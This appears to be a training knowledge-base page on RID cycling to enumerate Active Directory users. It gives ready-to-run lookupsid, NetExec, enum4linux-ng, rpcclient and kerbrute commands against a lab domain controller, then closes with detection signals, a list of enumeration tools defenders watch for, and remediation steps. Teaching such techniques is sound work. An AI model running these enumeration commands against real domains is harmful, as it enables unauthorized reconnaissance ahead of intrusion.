Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 01. Initial Access / Enumeration

RID Cycling

RID cycling enumerates domain users and groups by asking the domain to resolve sequential SIDs.

It is useful when direct user listing is blocked but SMB/RPC still allows name lookups.


Fast Path

lookupsid.py 'OOTW/Guest:@10.10.10.200'
nxc smb 10.10.10.200 -u 'guest' -p '' --rid-brute
enum4linux-ng -R 500-3000 10.10.10.200

If Guest is blocked, try with a known low-privileged credential:

nxc smb 10.10.10.200 -d ootw.local -u alice.wright -p 'StudentPass2026!' --rid-brute

Manual RPC Method

Get the domain SID:

rpcclient 10.10.10.200 -U 'guest%' -c 'lsaquery'

Set it:

export SID='S-1-5-21-REPLACE-ME'

Cycle common RID ranges:

for RID in $(seq 500 2000); do
  rpcclient 10.10.10.200 -U 'guest%' -c "lookupsids $SID-$RID"
done | tee rid-raw.txt

Extract names:

grep -v 'unknown' rid-raw.txt | tee rid-found.txt

What RIDs Mean

Common values:

500  built-in Administrator
501  Guest
502  krbtgt
512  Domain Admins
513  Domain Users
514  Domain Guests
515  Domain Computers

Custom users and groups usually appear above 1000.


Build A User List

Convert RID output into a clean username list:

grep -E 'SidTypeUser|User' rid-found.txt |
  awk -F'\\\\' '{print $2}' |
  awk '{print $1}' |
  tr '[:upper:]' '[:lower:]' |
  sort -u > users.txt

Validate with Kerberos:

kerbrute userenum -d ootw.local --dc 10.10.10.200 users.txt -o kerbrute-users.txt

Detection

Defenders look for:

  • repeated SAMR or LSARPC lookups
  • SMB/RPC traffic to the DC from unusual hosts
  • Security 4661 and 4662 when object access auditing is enabled
  • Security 4776 for NTLM authentication around enumeration
  • tool execution such as rpcclient, enum4linux, lookupsid, or NetExec

Remediation

  • restrict anonymous SMB/RPC enumeration
  • disable Guest access
  • monitor sequential RID lookup patterns
  • restrict SMB access to DCs from unmanaged networks
  • alert on enumeration tooling from workstations